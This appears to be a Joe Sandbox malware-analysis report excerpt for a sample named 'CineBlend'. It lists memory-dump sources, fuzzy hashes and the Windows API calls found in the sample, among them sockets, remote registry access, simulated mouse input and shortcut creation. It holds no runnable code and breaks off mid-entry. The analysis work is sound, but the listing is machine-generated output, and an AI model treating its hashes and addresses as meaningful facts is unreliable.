                                          • %s (%d) : ==> %s: %s %s, xrefs: 00BAE36D
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message
                                          • String ID: %s (%d) : ==> %s: %s %s
                                          • API String ID: 4072794657-3128320259
                                          • Opcode ID: 9e78e1ef094e451cdd6a8417a453c375704b7e38ba6976f57c7fca4b1b630a8f
                                          • Instruction ID: 6bb5f8937f0461edb3e0b764ee26dc324b3b3784bc53f1c12771bb7388b44f5c
                                          • Opcode Fuzzy Hash: 9e78e1ef094e451cdd6a8417a453c375704b7e38ba6976f57c7fca4b1b630a8f
                                          • Instruction Fuzzy Hash: 900186F29002087FE71197A48D89EFBB7ACDB08700F0145A2B759E7041FA74DE848B75
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,?), ref: 00BB1322
                                          • EnterCriticalSection.KERNEL32(00000000,?), ref: 00BB1334
                                          • TerminateThread.KERNEL32(00000000,000001F6), ref: 00BB1342
                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00BB1350
                                          • CloseHandle.KERNEL32(00000000), ref: 00BB135F
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BB136F
                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 00BB1376
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 3495660284-0
                                          • Opcode ID: e375b2064d7d6980ed7e646a9a132564854fac8538ee4872540f6925bf82cf8f
                                          • Instruction ID: 9afd5f7351719dbfd0d47e338da1d931d8f805a4c98daae2da169ee1cd01be98
                                          • Opcode Fuzzy Hash: e375b2064d7d6980ed7e646a9a132564854fac8538ee4872540f6925bf82cf8f
                                          • Instruction Fuzzy Hash: 06F0EC32043612BBD7411B54EE59BD6FB79FF05312F801522F141928A0EB749471CF94
                                          APIs
                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00BC281D
                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00BC283E
                                          • WSAGetLastError.WSOCK32 ref: 00BC284F
                                          • htons.WSOCK32(?,?,?,?,?), ref: 00BC2938
                                          • inet_ntoa.WSOCK32(?), ref: 00BC28E9
                                            • Part of subcall function 00BA433E: _strlen.LIBCMT ref: 00BA4348
                                            • Part of subcall function 00BC3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00BBF669), ref: 00BC3C9D
                                          • _strlen.LIBCMT ref: 00BC2992
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                          • String ID:
                                          • API String ID: 3203458085-0
                                          • Opcode ID: 2915f8906ba8cfa693c3ca335f3acc065cb214c67bbfe74d1cfe474fcbf369b1
                                          • Instruction ID: 3be602a8ccdb42accfed0f782cd46527c4ea5a8c6f293739bd974303e721b75c
                                          • Opcode Fuzzy Hash: 2915f8906ba8cfa693c3ca335f3acc065cb214c67bbfe74d1cfe474fcbf369b1
                                          • Instruction Fuzzy Hash: 17B19D35604300AFD324DF24C895F2ABBE5EF84318F54899CF49A5B2A2DB71EE45CB91
                                          APIs
                                          • __allrem.LIBCMT ref: 00B7042A
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B70446
                                          • __allrem.LIBCMT ref: 00B7045D
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B7047B
                                          • __allrem.LIBCMT ref: 00B70492
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B704B0
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 1992179935-0
                                          • Opcode ID: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
                                          • Instruction ID: 28e4e0822bd489591987173aa460052c503ebc519e6299c2e956b20d8e3fc3e9
                                          • Opcode Fuzzy Hash: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
                                          • Instruction Fuzzy Hash: 8F81C572610706DBE724BF69CC81B6A73F9EF54324F24C1ABE639D6681E770D9008B94
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B68649,00B68649,?,?,?,00B767C2,00000001,00000001,8BE85006), ref: 00B765CB
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B767C2,00000001,00000001,8BE85006,?,?,?), ref: 00B76651
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B7674B
                                          • __freea.LIBCMT ref: 00B76758
                                            • Part of subcall function 00B73B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B60165,?,?,00BB11D9,0000FFFF), ref: 00B73BC5
                                          • __freea.LIBCMT ref: 00B76761
                                          • __freea.LIBCMT ref: 00B76786
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                          • String ID:
                                          • API String ID: 1414292761-0
                                          • Opcode ID: d026af6dece80900d6c0916d6c0c46fb62ead1d206d5127f426fd4e21f8c25ba
                                          • Instruction ID: 028990a9074aa5e2c0d281a3b4c7a66caa0ef449cce530778563bff26686cbca
                                          • Opcode Fuzzy Hash: d026af6dece80900d6c0916d6c0c46fb62ead1d206d5127f426fd4e21f8c25ba
                                          • Instruction Fuzzy Hash: 5F510472610606AFDB298F64CC81EBB77EAEB40794F1486A9FC3DD6140EB34DC50D6A0
                                          APIs
                                            • Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333
                                            • Part of subcall function 00BCD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCC10E,?,?), ref: 00BCD415
                                            • Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD451
                                            • Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD4C8
                                            • Part of subcall function 00BCD3F8: _wcslen.LIBCMT ref: 00BCD4FE
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BCC72A
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BCC785
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00BCC7CA
                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BCC7F9
                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BCC853
                                          • RegCloseKey.ADVAPI32(?), ref: 00BCC85F
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                          • String ID:
                                          • API String ID: 1120388591-0
                                          • Opcode ID: a0cceff35fa44fdd0d924a647c21de2ab3f1e617917506c9d34e561801716e3f
                                          • Instruction ID: fab34b2208ce406a4463f92e4b5d7456eb156acfd9213f34c058b0c6982bc616
                                          • Opcode Fuzzy Hash: a0cceff35fa44fdd0d924a647c21de2ab3f1e617917506c9d34e561801716e3f
                                          • Instruction Fuzzy Hash: 3C819D30208241AFC714DF24C895F2ABBE5FF84308F1485ADF5998B2A2DB31ED05CB92
                                          APIs
                                          • VariantInit.OLEAUT32(00000035), ref: 00BA00A9
                                          • SysAllocString.OLEAUT32(00000000), ref: 00BA0150
                                          • VariantCopy.OLEAUT32(00BA0354,00000000), ref: 00BA0179
                                          • VariantClear.OLEAUT32(00BA0354), ref: 00BA019D
                                          • VariantCopy.OLEAUT32(00BA0354,00000000), ref: 00BA01A1
                                          • VariantClear.OLEAUT32(?), ref: 00BA01AB
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCopy$AllocInitString
                                          • String ID:
                                          • API String ID: 3859894641-0
                                          • Opcode ID: 3ad356a355eacb01a35367aceedba67eedbc1836c2af1c8cf5d2a3a0e22d1a4c
                                          • Instruction ID: df2f507c2d85df3ae381d20f000898d08a42795cfbae3e766ebadf7c8e81548b
                                          • Opcode Fuzzy Hash: 3ad356a355eacb01a35367aceedba67eedbc1836c2af1c8cf5d2a3a0e22d1a4c
                                          • Instruction Fuzzy Hash: 9651C331624314AACF20BB6498D9B6DB3E5EF57310F2484C7F906EF296DA709C44CB96
                                          APIs
                                            • Part of subcall function 00B441EA: _wcslen.LIBCMT ref: 00B441EF
                                            • Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A
                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00BB9F2A
                                          • _wcslen.LIBCMT ref: 00BB9F4B
                                          • _wcslen.LIBCMT ref: 00BB9F72
                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00BB9FCA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: _wcslen$FileName$OpenSave
                                          • String ID: X
                                          • API String ID: 83654149-3081909835
                                          • Opcode ID: 33d930a39dd1c881284505365035875262bc7367d23d004ffa79ac510863c2c8
                                          • Instruction ID: 4ceadc6ff21498138814a284784ae22b9135567e55434d560f5fb39ebea2533c
                                          • Opcode Fuzzy Hash: 33d930a39dd1c881284505365035875262bc7367d23d004ffa79ac510863c2c8
                                          • Instruction Fuzzy Hash: 5BE184319043409FD724EF25C881BAAB7E5FF85314F0485ADF9899B2A2DB71ED05CB92
                                          APIs
                                          • _wcslen.LIBCMT ref: 00BB6F21
                                          • CoInitialize.OLE32(00000000), ref: 00BB707E
                                          • CoCreateInstance.OLE32(00BE0CC4,00000000,00000001,00BE0B34,?), ref: 00BB7095
                                          • CoUninitialize.OLE32 ref: 00BB7319
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                          • String ID: .lnk
                                          • API String ID: 886957087-24824748
                                          • Opcode ID: c82de377fafdea5b606dfcb525179690620dc5ebfff83740b8ee8aa76c1ac58d
                                          • Instruction ID: d55ecab9584d21cb9009e4419b7bcdb9da4b0bb43e4186484881a881d5484621
                                          • Opcode Fuzzy Hash: c82de377fafdea5b606dfcb525179690620dc5ebfff83740b8ee8aa76c1ac58d
                                          • Instruction Fuzzy Hash: 22D12971508201AFC304EF24C881EABB7E8FF99704F5049ADF5959B262DB71EE45CB92
                                          APIs
                                            • Part of subcall function 00B4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B424B0
                                          • BeginPaint.USER32(?,?,?), ref: 00B41B35
                                          • GetWindowRect.USER32(?,?), ref: 00B41B99
                                          • ScreenToClient.USER32(?,?), ref: 00B41BB6
                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B41BC7
                                          • EndPaint.USER32(?,?,?,?,?), ref: 00B41C15
                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00B83287
                                            • Part of subcall function 00B41C2D: BeginPath.GDI32(00000000), ref: 00B41C4B
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                          • String ID:
                                          • API String ID: 3050599898-0
                                          • Opcode ID: 903e49578882446f7e3e188bba32b201056112b6da09cb85fb53fb4b42bafdf1
                                          • Instruction ID: b2185935dbbaf5a2fa88a6dd35e936503a6a0788c871a304edcfeda3845babf9
                                          • Opcode Fuzzy Hash: 903e49578882446f7e3e188bba32b201056112b6da09cb85fb53fb4b42bafdf1
                                          • Instruction Fuzzy Hash: B741B570505300AFDB10EF18DCC5FBA7BE8EB45720F0405A9F5948B2B1D7319984EB62
                                          APIs
                                          • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00B9FBEF,00000000,?,?,00000000,?,00B839E2,00000004,00000000,00000000), ref: 00BD8CA7
                                          • EnableWindow.USER32(?,00000000), ref: 00BD8CCD
                                          • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00BD8D2C
                                          • ShowWindow.USER32(?,00000004), ref: 00BD8D40
                                          • EnableWindow.USER32(?,00000001), ref: 00BD8D66
                                          • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00BD8D8A
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$Show$Enable$MessageSend
                                          • String ID:
                                          • API String ID: 642888154-0
                                          • Opcode ID: b7412e7fb595af25dc4757d2c6f46f2be50458a76a0cc6902227f9022168bbee
                                          • Instruction ID: 4994876aad82d92ef815a5948207c8da52205ee85e46a31153029b6e2070df97
                                          • Opcode Fuzzy Hash: b7412e7fb595af25dc4757d2c6f46f2be50458a76a0cc6902227f9022168bbee
                                          • Instruction Fuzzy Hash: CF418334602244EFDB25DF24C895BE5BBF2FB46705F1840EAE5484B3A2EB31A856CB50
                                          APIs
                                          • GetForegroundWindow.USER32(?,?,00000000), ref: 00BC2D45
                                            • Part of subcall function 00BBEF33: GetWindowRect.USER32(?,?), ref: 00BBEF4B
                                          • GetDesktopWindow.USER32 ref: 00BC2D6F
                                          • GetWindowRect.USER32(00000000), ref: 00BC2D76
                                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00BC2DB2
                                          • GetCursorPos.USER32(?), ref: 00BC2DDE
                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00BC2E3C
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                          • String ID:
                                          • API String ID: 2387181109-0
                                          • Opcode ID: 0e1b398597576848e26ca8fe6a9a5fa2c082ed6dee04b713a10496916c87b13d
                                          • Instruction ID: 7d9a5061175206cf8f2b93d0fb4219cebbc99a7f0dd0362833aab56aee9d29df
                                          • Opcode Fuzzy Hash: 0e1b398597576848e26ca8fe6a9a5fa2c082ed6dee04b713a10496916c87b13d
                                          • Instruction Fuzzy Hash: E831D072505316ABC720DF18D845FABB7E9FB95314F00096EF89597181DA30E909CBE2
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00BA55F9
                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00BA5616
                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00BA564E
                                          • _wcslen.LIBCMT ref: 00BA566C
                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00BA5674
                                          • _wcsstr.LIBVCRUNTIME ref: 00BA567E
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                          • String ID:
                                          • API String ID: 72514467-0
                                          • Opcode ID: 295f6f7e2afb14ae96b599a9a2de76d9b9ada571ed3c236ad66a27c5dfe4ae56
                                          • Instruction ID: f0a180262b1bd1060a9ba4f59592bc03bcce0fd3e5223a1db5b1fc3df5c3183d
                                          • Opcode Fuzzy Hash: 295f6f7e2afb14ae96b599a9a2de76d9b9ada571ed3c236ad66a27c5dfe4ae56
                                          • Instruction Fuzzy Hash: 4A213832208600BBEB255B39DC49E7FBBECDF46710F1440AAF905DA091EF74CE4186A0
                                          APIs
                                            • Part of subcall function 00B45851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B455D1,?,?,00B84B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00B45871
                                          • _wcslen.LIBCMT ref: 00BB62C0
                                          • CoInitialize.OLE32(00000000), ref: 00BB63DA
                                          • CoCreateInstance.OLE32(00BE0CC4,00000000,00000001,00BE0B34,?), ref: 00BB63F3
                                          • CoUninitialize.OLE32 ref: 00BB6411
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                          • String ID: .lnk
                                          • API String ID: 3172280962-24824748
                                          • Opcode ID: ed198cfe99abc1e06453f7deff514f9e73d2888cb2280216349a4660c8007dc6
                                          • Instruction ID: 2480a2a53c60345f7031104a4a66c7267a0578cb1d1c10f8812aae66f7d508d9
                                          • Opcode Fuzzy Hash: ed198cfe99abc1e06453f7deff514f9e73d2888cb2280216349a4660c8007dc6
                                          • Instruction Fuzzy Hash: A4D13171A042019FCB14EF28C480AAEBBE5FF89714F148899F8859B361DB75ED45CB92
                                          APIs
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00BD8740
                                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00BD8765
                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00BD877D
                                          • GetSystemMetrics.USER32(00000004), ref: 00BD87A6
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00BBC1F2,00000000), ref: 00BD87C6
                                            • Part of subcall function 00B4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B424B0
                                          • GetSystemMetrics.USER32(00000004), ref: 00BD87B1
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$Long$MetricsSystem
                                          • String ID:
                                          • API String ID: 2294984445-0
                                          • Opcode ID: f727995e0ba662997ba3c2ead98213d4cd79ba47fa4912d7bcf05a5aa6eda3b8
                                          • Instruction ID: 4955ac354d7cb055955b2d0ecdd58ceb7a6cf0974a0af647353da5423f31a608
                                          • Opcode Fuzzy Hash: f727995e0ba662997ba3c2ead98213d4cd79ba47fa4912d7bcf05a5aa6eda3b8
                                          • Instruction Fuzzy Hash: FE217F716112429FCB145F38CC48B6AB7E5EB45326F25466AB966C72E0FE309C50DB10
                                          APIs
                                          • GetLastError.KERNEL32(?,?,00B636E9,00B63355), ref: 00B63700
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B6370E
